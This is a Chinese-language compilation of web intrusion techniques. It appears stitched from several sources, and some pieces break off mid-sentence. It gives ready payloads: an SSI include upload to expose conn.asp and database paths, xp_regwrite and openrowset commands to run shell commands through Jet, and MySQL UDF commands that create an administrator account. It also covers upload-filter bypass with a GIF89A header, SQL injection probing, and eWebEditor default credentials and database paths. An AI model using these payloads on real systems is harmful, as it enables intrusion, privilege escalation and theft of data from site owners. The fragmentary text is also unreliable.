/usr/local/Zend/etc/php.ini

方法:上传一个shtm文件, 内容为:

<!--#include file="conn.asp"-->

直接请求这个shtm文件, conn.asp就一览无遗, 数据库路径也就到手啦!

解析:

<!--#include file="conn.asp"-->
就是一条SSI指令，其作用是将"conn.asp"的内容拷贝到当前的页面中，当访问者来浏览时，会看到其

它HTML文档一样显示conn.asp其中的内容。

前提:服务器的对shtm或者shtml的扩展没有删除！

至于conn.asp可以为其他,比如config.inc.php config.asp

1, 沙盒模式的变通.

原始方法:

第一句开启沙盘模式：exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
复制代码第二句利用jet.oledb执行系统命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)  
复制代码或select *

mysql提权总结方法四则

一 UDF提权
这类提权方法我想大家已经知道了，我大致写一下，具体语句如下：
create function cmdshell returns string soname 'udf.dll'  
select cmdshell('net user iis_user 123!@#abcABC /add');  
select cmdshell('net localgroup administrators iis_user /add');  
select cmdshell('regedit /s d:\web\3389.reg');  
drop function cmdshell;  

1、
对一般遇到.net的网站时
通常会注册个用户
第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过

2、
第二种就是注入了, 在?id=xx后加单引号 " ' "
一般情况下 用NBSI 啊D来SCAN 都可以发现BUG页面
而且国内大多.net都是使用MSSQL数据库
发现注入点也可以从login下手 其实这个方法目前的成功率在75%

3、
不过遇到搜索型的,和没错误信息回显的时候 在这里就卡住了
大家可以看看网上一篇 搜索型注入的文章 运气好,数据库和WEB在一起
直接在搜索里

Ewebeditor大家应该是再熟悉不过的吧？先用默认密码admin888登陆，不行就下载默认数据库‘/db/ewebeditor.mdb”，如 果默认数据库也改了的话我们是不是就该放弃了呢？这里告诉大家我的经验！就是用密码admin999登陆，或者输入“/db /ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标！
-------------------------------------------------------------------------------------
eWebEditor的另类入侵
有一个办法可以在没有登陆eWebEditor的情况下传我们的ASP或ASA

http://www.waitalone.cn/post/541.html